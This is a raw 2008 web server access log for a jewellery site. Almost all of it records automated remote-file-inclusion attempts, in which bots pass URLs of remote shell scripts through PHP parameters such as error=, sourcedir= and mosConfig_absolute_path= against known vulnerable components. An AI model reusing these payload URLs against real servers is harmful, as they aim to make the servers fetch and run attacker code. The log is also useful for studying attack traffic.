83.12.119.178 - - [30/Jul/2008:20:47:13 -0700] "GET /logs/access_080501.log//atom.php5?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:20:47:19 -0700] "GET /logs/access.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:20:47:19 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:20:47:20 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
207.210.115.114 - - [30/Jul/2008:20:52:58 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
207.210.115.114 - - [30/Jul/2008:20:52:58 -0700] "GET /send_reminders.php?includedir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
207.210.115.114 - - [30/Jul/2008:20:52:58 -0700] "GET /logs/send_reminders.php?includedir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
87.244.11.20 - - [30/Jul/2008:20:54:04 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
87.244.11.20 - - [30/Jul/2008:20:54:04 -0700] "GET /send_reminders.php?includedir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
87.244.11.20 - - [30/Jul/2008:20:54:04 -0700] "GET /logs/send_reminders.php?includedir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.111.179.12 - - [30/Jul/2008:20:54:06 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.111.179.12 - - [30/Jul/2008:20:54:06 -0700] "GET /send_reminders.php?includedir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.111.179.12 - - [30/Jul/2008:20:54:06 -0700] "GET /logs/send_reminders.php?includedir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.108.67.220 - - [30/Jul/2008:20:54:58 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
89.108.67.220 - - [30/Jul/2008:20:54:58 -0700] "GET /send_reminders.php?includedir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
89.108.67.220 - - [30/Jul/2008:20:54:59 -0700] "GET /logs/send_reminders.php?includedir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
75.127.70.16 - - [30/Jul/2008:21:04:24 -0700] "GET /logs/access.log//components/errors.php?error=http://www.pne.de/contenido/cronjobs/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
75.127.70.16 - - [30/Jul/2008:21:04:24 -0700] "GET //components/errors.php?error=http://www.pne.de/contenido/cronjobs/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
75.127.70.16 - - [30/Jul/2008:21:04:24 -0700] "GET /logs//components/errors.php?error=http://www.pne.de/contenido/cronjobs/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
80.231.0.98 - - [30/Jul/2008:21:09:08 -0700] "GET /errors.php?error=http://geocities.com/rais_corp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:21:12:41 -0700] "GET //skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:21:12:41 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:21:12:41 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:21:13:34 -0700] "GET //skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:21:13:35 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:21:13:36 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:21:14:08 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:21:14:08 -0700] "GET //skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:21:14:08 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
67.19.81.18 - - [30/Jul/2008:21:14:32 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
67.19.81.18 - - [30/Jul/2008:21:14:32 -0700] "GET //skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
67.19.81.18 - - [30/Jul/2008:21:14:34 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
141.85.101.1 - - [30/Jul/2008:21:17:48 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
141.85.101.1 - - [30/Jul/2008:21:17:48 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
141.85.101.1 - - [30/Jul/2008:21:17:48 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
85.239.113.1 - - [30/Jul/2008:21:22:41 -0700] "GET /logs/access.log/errors.php?error=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
85.239.113.1 - - [30/Jul/2008:21:22:41 -0700] "GET /errors.php?error=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
85.239.113.1 - - [30/Jul/2008:21:22:41 -0700] "GET /logs/errors.php?error=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
74.55.113.226 - - [30/Jul/2008:21:23:30 -0700] "GET /logs/access.log/?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
74.55.113.226 - - [30/Jul/2008:21:23:30 -0700] "GET /?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 779 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
89.111.179.12 - - [30/Jul/2008:21:23:38 -0700] "GET /logs/access_080501.log/send_reminders.php?includedir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
80.231.0.98 - - [30/Jul/2008:21:26:36 -0700] "GET /logs/access.log/errors.php?error=http://geocities.com/rais_corp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
80.231.0.98 - - [30/Jul/2008:21:26:36 -0700] "GET /logs/errors.php?error=http://geocities.com/rais_corp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
74.55.113.226 - - [30/Jul/2008:21:27:01 -0700] "GET /logs/access.log/?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
74.55.113.226 - - [30/Jul/2008:21:27:01 -0700] "GET /?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.sojewels.com"
74.55.113.226 - - [30/Jul/2008:21:27:01 -0700] "GET /logs/?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 1796 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jul/2008:21:27:17 -0700] "GET /logs/access.log/?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
62.112.193.46 - - [30/Jul/2008:21:27:18 -0700] "GET /?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 779 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
62.112.193.46 - - [30/Jul/2008:21:30:09 -0700] "GET /logs/access.log/?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jul/2008:21:30:09 -0700] "GET /?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jul/2008:21:30:10 -0700] "GET /logs/?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 1796 "-" "libwww-perl/5.805" "www.sojewels.com"
74.55.113.226 - - [30/Jul/2008:21:31:30 -0700] "GET /?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.sojewels.com"
67.19.81.18 - - [30/Jul/2008:21:34:08 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
67.19.81.18 - - [30/Jul/2008:21:34:08 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
67.19.81.18 - - [30/Jul/2008:21:34:11 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
81.169.186.162 - - [30/Jul/2008:21:34:31 -0700] "GET /logs/access.log/errors.php?error=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
81.169.186.162 - - [30/Jul/2008:21:34:31 -0700] "GET /errors.php?error=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
81.169.186.162 - - [30/Jul/2008:21:34:31 -0700] "GET /logs/errors.php?error=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
69.73.136.95 - - [30/Jul/2008:21:36:19 -0700] "GET /logs/access.log//?sourcedir=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
69.73.136.95 - - [30/Jul/2008:21:36:19 -0700] "GET //?sourcedir=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.sojewels.com"
69.73.136.95 - - [30/Jul/2008:21:36:19 -0700] "GET /logs//?sourcedir=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 200 1801 "-" "libwww-perl/5.805" "www.sojewels.com"
69.73.136.95 - - [30/Jul/2008:21:37:10 -0700] "GET /logs/access.log//?sourcedir=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
69.73.136.95 - - [30/Jul/2008:21:37:10 -0700] "GET /logs//?sourcedir=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 200 1801 "-" "libwww-perl/5.805" "www.sojewels.com"
69.73.136.95 - - [30/Jul/2008:21:37:10 -0700] "GET //?sourcedir=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jul/2008:21:38:42 -0700] "GET /?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.sojewels.com"
85.239.113.1 - - [30/Jul/2008:21:43:24 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
85.239.113.1 - - [30/Jul/2008:21:43:24 -0700] "GET ///vwar/backup/errors.php?error=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
85.239.113.1 - - [30/Jul/2008:21:43:24 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
69.93.189.130 - - [30/Jul/2008:21:47:52 -0700] "GET /logs/access.log/errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
69.93.189.130 - - [30/Jul/2008:21:47:52 -0700] "GET /logs/errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
69.93.189.130 - - [30/Jul/2008:21:47:52 -0700] "GET /errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.232.71.106 - - [30/Jul/2008:21:47:59 -0700] "GET /logs/access.log/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
72.232.71.106 - - [30/Jul/2008:21:47:59 -0700] "GET /errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
72.232.71.106 - - [30/Jul/2008:21:47:59 -0700] "GET /logs/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
64.22.89.194 - - [30/Jul/2008:21:48:16 -0700] "GET /logs/access.log/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
64.22.89.194 - - [30/Jul/2008:21:48:16 -0700] "GET /errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
64.22.89.194 - - [30/Jul/2008:21:48:16 -0700] "GET /logs/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
72.232.71.106 - - [30/Jul/2008:21:51:12 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
72.232.71.106 - - [30/Jul/2008:21:51:12 -0700] "GET ///vwar/backup/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
72.232.71.106 - - [30/Jul/2008:21:51:12 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
64.22.89.194 - - [30/Jul/2008:21:51:15 -0700] "GET ///vwar/backup/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
64.22.89.194 - - [30/Jul/2008:21:51:15 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
64.22.89.194 - - [30/Jul/2008:21:51:15 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
69.65.33.36 - - [30/Jul/2008:21:54:18 -0700] "GET /logs/access.log/errors.php?error=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
69.65.33.36 - - [30/Jul/2008:21:54:18 -0700] "GET /logs/errors.php?error=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
69.65.33.36 - - [30/Jul/2008:21:54:18 -0700] "GET /errors.php?error=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
193.207.106.54 - - [30/Jul/2008:21:55:28 -0700] "GET /logs/access.log/errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
193.207.106.54 - - [30/Jul/2008:21:55:28 -0700] "GET /errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
193.207.106.54 - - [30/Jul/2008:21:55:28 -0700] "GET /logs/errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:21:56:14 -0700] "GET /logs/access.log/errors.php?error=http://sujianto.com/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:21:56:14 -0700] "GET /errors.php?error=http://sujianto.com/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:21:56:15 -0700] "GET /logs/errors.php?error=http://sujianto.com/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
74.55.113.226 - - [30/Jul/2008:21:59:55 -0700] "GET /logs/access_080131.log/?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:22:02:27 -0700] "GET /logs//index.php?ort=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:22:02:29 -0700] "GET /logs/access.log//index.php?ort=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:22:02:30 -0700] "GET /logs//index.php?ort=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:22:02:30 -0700] "GET //index.php?ort=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:22:02:30 -0700] "GET /logs//index.php?ort=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:22:02:30 -0700] "GET /logs/access.log//index.php?ort=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:22:02:30 -0700] "GET //index.php?ort=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:22:02:31 -0700] "GET /logs/access.log//index.php?ort=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:22:02:31 -0700] "GET //index.php?ort=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
67.19.81.18 - - [30/Jul/2008:22:03:01 -0700] "GET /logs/access.log//index.php?ort=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
67.19.81.18 - - [30/Jul/2008:22:03:01 -0700] "GET //index.php?ort=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
67.19.81.18 - - [30/Jul/2008:22:03:02 -0700] "GET /logs//index.php?ort=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:22:03:10 -0700] "GET /logs//index.php?ort=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:22:03:16 -0700] "GET //index.php?ort=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.146.61.130 - - [30/Jul/2008:22:03:16 -0700] "GET /logs/access.log//index.php?ort=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
67.19.81.18 - - [30/Jul/2008:22:03:31 -0700] "GET /logs/access.log//index.php?ort=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
67.19.81.18 - - [30/Jul/2008:22:03:31 -0700] "GET //index.php?ort=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
67.19.81.18 - - [30/Jul/2008:22:03:37 -0700] "GET /logs//index.php?ort=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
67.19.81.18 - - [30/Jul/2008:22:09:50 -0700] "GET /logs/access_080501.log//index.php?ort=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
67.19.81.18 - - [30/Jul/2008:22:14:14 -0700] "GET /logs/access_080501.log//index.php?ort=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
74.53.240.146 - - [30/Jul/2008:22:15:33 -0700] "GET /errors.php?error=http://hades.pdg.pl/VooPrivateStuff/respone.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
72.9.145.107 - - [30/Jul/2008:22:22:37 -0700] "GET /logs/access.log//errors.php?error=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.9.145.107 - - [30/Jul/2008:22:22:37 -0700] "GET //errors.php?error=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.9.145.107 - - [30/Jul/2008:22:22:37 -0700] "GET /logs//errors.php?error=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
62.112.193.46 - - [30/Jul/2008:22:26:52 -0700] "GET /logs/access_080131.log/?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
87.106.71.64 - - [30/Jul/2008:22:30:04 -0700] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
87.106.71.64 - - [30/Jul/2008:22:30:04 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
87.106.71.64 - - [30/Jul/2008:22:30:04 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
85.214.59.54 - - [30/Jul/2008:22:30:43 -0700] "GET /logs/access.log/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
85.214.59.54 - - [30/Jul/2008:22:30:43 -0700] "GET /errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
85.214.59.54 - - [30/Jul/2008:22:30:44 -0700] "GET /logs/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
74.53.240.146 - - [30/Jul/2008:22:31:10 -0700] "GET /logs/access.log/errors.php?error=http://hades.pdg.pl/VooPrivateStuff/respone.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
74.53.240.146 - - [30/Jul/2008:22:31:10 -0700] "GET /logs/errors.php?error=http://hades.pdg.pl/VooPrivateStuff/respone.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
209.97.201.148 - - [30/Jul/2008:22:31:34 -0700] "GET /logs/access.log/errors.php?error=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
209.97.201.148 - - [30/Jul/2008:22:31:34 -0700] "GET /errors.php?error=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
209.97.201.148 - - [30/Jul/2008:22:31:34 -0700] "GET /logs/errors.php?error=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
69.93.189.130 - - [30/Jul/2008:22:33:26 -0700] "GET /logs/errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
69.93.189.130 - - [30/Jul/2008:22:33:27 -0700] "GET /logs/access.log/errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
69.93.189.130 - - [30/Jul/2008:22:33:27 -0700] "GET /errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
195.93.201.102 - - [30/Jul/2008:22:34:19 -0700] "GET /logs/access.log/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
